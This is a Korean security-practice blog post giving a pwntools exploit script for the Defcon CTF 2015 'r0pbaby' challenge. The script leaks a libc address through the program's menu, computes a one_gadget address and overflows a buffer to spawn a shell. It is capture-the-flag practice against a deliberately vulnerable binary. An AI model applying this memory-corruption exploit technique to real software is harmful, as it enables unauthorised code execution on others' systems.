Defcon CTF 2015 r0pbaby

System/Pwnable Practice 2019. 7. 28. 22:13

exploit.py

from pwn import *
  
p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc

pop_rdi_offset = 0x000000000002155f
gets_offset = libc.symbols['gets']
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]

p.sendlineafter(': ', '2')
p.sendlineafter(': ', 'gets')
gets_addr = int(p.recvline().split(' ')[2], 16)

libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

payload = 'A' * 8
payload += p64(one_addr)


p.sendlineafter(': ', '3')
p.sendlineafter(': ', str(len(payload)+1))
p.sendline(payload)

p.sendlineafter(': ', '4')
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

Defcon CTF 2016 Feed me (0)	2019.07.29
SECCON CTF 2018 Classic (0)	2019.07.28
Pico CTF 2018 Can you gets me (0)	2019.07.28
Pico CTF 2018 Buffer Overflow 3 (0)	2019.07.27
Codegate 2018 CTF Quals BaskinRobins31 (0)	2019.07.24

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

Defcon CTF 2015 r0pbaby

'System > Pwnable Practice' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바